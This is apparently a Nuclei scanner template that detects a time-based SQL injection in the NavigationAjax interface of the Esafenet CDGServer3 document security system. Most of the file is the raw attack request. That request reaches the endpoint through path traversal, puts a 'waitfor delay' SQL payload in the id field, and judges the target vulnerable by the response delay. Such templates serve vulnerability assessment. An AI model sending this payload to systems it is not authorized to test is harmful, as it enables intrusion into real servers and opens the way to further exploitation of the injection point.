id: esafenet-cdgserver3-NavigationAjax-sqli
info:
  name: 亿赛通电子文档安全管理系统 NavigationAjax - sqli
  author: leadlife
  severity: high
  description: 
  reference: 
    - https://github.com/wy876/POC/blob/main/%E4%BA%BF%E8%B5%9B%E9%80%9A%E7%94%B5%E5%AD%90%E6%96%87%E6%A1%A3%E5%AE%89%E5%85%A8%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9F/%E4%BA%BF%E8%B5%9B%E9%80%9A%E7%94%B5%E5%AD%90%E6%96%87%E6%A1%A3%E5%AE%89%E5%85%A8%E7%AE%A1%E7%90%86%E7%B3%BB%E7%BB%9FNavigationAjax%E6%8E%A5%E5%8F%A3%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
  classification:
    cve-id: 
  metadata:
    verified: true
    fofa-query: demo
  tags: 2024,sqli,esafenet

http:
  - raw:  
      - |
        @timeout: 15s
        POST /CDGServer3/js/../NavigationAjax HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
        Content-Type: application/x-www-form-urlencoded

        command=nav&id=-999'waitfor delay '0:0:6'--+&name=&openId=

    matchers:
      - type: dsl
        dsl:
          - contains_all(header,'CDGServer3')
          - status_code == 200
          - duration >= 5 && duration < 9
        condition: and